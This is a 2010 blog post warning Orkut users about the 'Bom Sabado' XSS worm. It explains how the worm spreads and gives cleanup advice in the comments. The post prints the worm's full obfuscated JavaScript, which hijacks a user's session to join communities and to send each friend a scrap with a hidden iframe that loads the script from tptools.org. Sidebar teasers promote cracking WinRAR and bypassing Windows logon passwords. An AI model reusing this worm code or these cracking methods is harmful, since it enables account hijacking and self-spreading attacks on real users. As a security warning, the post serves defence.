Automate Repetitive tasks using Mouse/Macro Recorders
Through out a day, almost all computer user do many repetitive tasks on computer and internet. If you are one of them, then Macro recorders can help you to reduce the stress of repetitive tasks from your hands and wrist
How To Get Full Version of WinRAR For Free
Free winrar, Full version Winrar, Winrar Serial key I guess everyone know what is Winrar, and what it works. So without going into that deep, directly going to tell an easy procedure to convert Winrar trial version into full version. St
How to hack/Bypass windows logon password [VIDEO]
In response to query asked by Ameer Hasan Malik Did you forget your windows login password? or want to access Admin account in school or colleges? Whatever the reason is, this article can help you to get into the Admin account of y
Trick to identify the celebrity without staring and blinking eyes
Have you seen the illusion pictures that ask you to stare on the picture for some seconds and then blink your eyes to see the celebrity? Images below are the examples of such kind of illusion. Stare at the image for 20 seconds, then
Advantage of Chrome's Multi-Process Performance
Google Chrome was one of the first browsers to have multiple processes. If you are a frequent Google Chrome user, then you probabely have seen sometimes, multiple “chrome.exe” processes running in your task manager, with multiple time
Reduce Chrome Memory usage using TooManyTabs extension
Google Chrome was one of the first browsers to have multiple processes, which creates a separate process for each tab. That means , if you have 5 tabs opened on your Chrome browser, then you can see minimum 6&nb
Transform your Windows7 laptop into a Wi-Fi hotspot
In today's time, not even every home has a laptop or computer, but every member of family also own separate laptops or any other device with internet connection. And everyone want to use internet, prefect if you have a Wi-Fi at h
Sql Injection For Beginners: Tutorial 1
Many times my readers have asked me to write about SQL Injection, but i always used to consider that its pretty easy way of hacking and may be everyone already know about it. But now after years I think that, no, i was wrong.Still even ma
Orkut attacked by 'Bom Sabado' worm
Saturday, September 25, 2010|
Surbhi Verma
‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’
Hi Friends, Did you find this scrap in your scrapbook from many of your friends??? If yes, then dont visit the profile of person from which this message has come, coz ur friend profile is now infected my a Virus named..‘Bom Sabado!’. If you visit any affected profile, your profile and ur system will also get affect by this Virus!!!
What is ‘Bom Sabado!’?
'Bom Sabado' is a new worm of type XSS (cross-site scripting) attack, which is created by keeping total focus on Orkut.
'Bom Sabado' is a Portuguese word which means 'Good saturday.'
Only one country is there in which Orkut is still no. 1 in social websites, So it is assumed that someone has made this virus to attack on the popularity of Orkut.
How it works?
When any one open page that is infected by this worm. A JavaScript(form http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) will run automatically.which will automatically join some communities and send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends. Also this worm steal cookies from your browser.
Orkut has Temporarily Fixed the issue.
On Orkut Support Forums, its declared by a 'Top Contributor' that Orkut has Temporarily Fixed the issue.
Here what can be meant by temporarily... what i guess.. they have only removed the java script from the site http://tptools.org, but it will take time to Fix this 'Hole of Orkut' to save Orkut in coming times. so Just Be Aware!!!
I will suggest you all to Disable JavaScript of your Browser, to avoid this type of problem :)
Suggestion for users Affected by Bom Sabado
As This virus steal cookies from browser, so it is suggested to clear ur browser's cookies immediately and change your all passwords.
Coding of Bom Sabado Worm taken from http://tptools.org/
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63\x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x79\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x73\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x23\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72\x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x54\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x36\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x39\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x31\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B","\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;
All readers are most welcomed to share their experience with these kind of Viruses attacks!!!
All readers are most welcomed to share their experience with these kind of Viruses attacks!!!
Posted in
Orkut Tips
6 comments for this post
Leave a reply
Subscribe to:
Post Comments (Atom)
.jpg "Subscribe on Youtube!!")
deepa kashyap
September 25, 2010 at 4:45 PM
hey thanks a lot as i checked my scrapbook i saw msg like that only ‘Bom Sabado' i was about to scrap him what does it means, in the meanwhile checked your post and oo god that's virus attack !!
what if i will hide that scrap??
Sn34k3r
September 25, 2010 at 7:53 PM
"Bom Sabado" Bug Creating Problems in Orkut
what is bom sabado, bom sabado meaning, meaning of bom sabado, bom sabado means, bom sabado!
Today in morning i saw every account was posting scrap some thing like bomb amungu or Bom Sabado.
And thos who all are reading this scrap even in their profile, their cookies are also stoled and so they are also posting scrap automatically to their friend list same scrap as bomb something like :(
The script is runnign on and also in status of profile their flag is coming. i mean status are automatically updated in some profile. Its their flag of Brazil. Already Google team are working on it.
By the Bom Sabado means Good Saturday
Currently what u should do is
Solutions:-
Follow these steps:
1. Immediately change your password and security question{ including secondary email and mobile number if they also got changed.) This will solve the problem.
2. Find out whether some communities has been joined automatically. if yeah, do remove them.
3. If your account has been completely hacked, see here:
http://www.google.com/support/forum/p/orkut/thread?tid=39fa418ed1162078&hl=en
4. Always remember these points :
4.1 Donot ever login to any site rather than www.orkut.com
4.2 Donot ever run any javascripts while logged into your orkut account
4.3 Never use any flooder in your account
4.4 Donot ever share your password with anyone else and keep changing your password regularly.
4.5 Donot ever click suspicious link while logged into Orkut a/c. if you are curious you can copy the link and check them in
other browser after cleaning it's browser's cookie and cache.
4.6 Donot ever install any suspicious script on greasemoneky and ALWAYS DIABLE THE GM before logging in to orkut.
4.7 Do your mobile verification also, so that you can get back your a/c if hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#MobileSetupSettings
4.8 Install a good Update Ant ivirus and Anti Key logger and keep your system free from Key loggers and backdoor trojans.
4.9 Use Virtual Keyboard to enter your password for more securite. KIS 2010 provides it and there are many other V.
keyboards available.
Take a look here and follow the points given to protect your a/c:
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=57442
and
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=48579
hope this helps you...;)
happy Orkutting..
Surbhi Verma
September 26, 2010 at 12:09 AM
@Deepa....No need to hide scrap, the problem is fixed now :)
But be aware for future.. never check the affected profile in future, if again this type of msg come!!!!
sudhansh jain
September 26, 2010 at 7:44 AM
Yeah i have also got some scraps like that ...but thnk god my profile is not affected by that!!
LoGaN
September 26, 2010 at 5:03 PM
If the browser is ran sandboxed, with that "Sandboxie" tool you gave, will it prevent the system from virus or the orkut profile to any extent ?
Surbhi Verma
September 28, 2010 at 8:20 PM
@Logan... very gud question....
well in these types of attack in which the hacker steal cookies of browser, then sandboxie could not also protect the users, coz if u run your browser in sanbox, still then if u keep save passwords, then it will be accessible by sandbox means it can be hacked by cooking stealer's.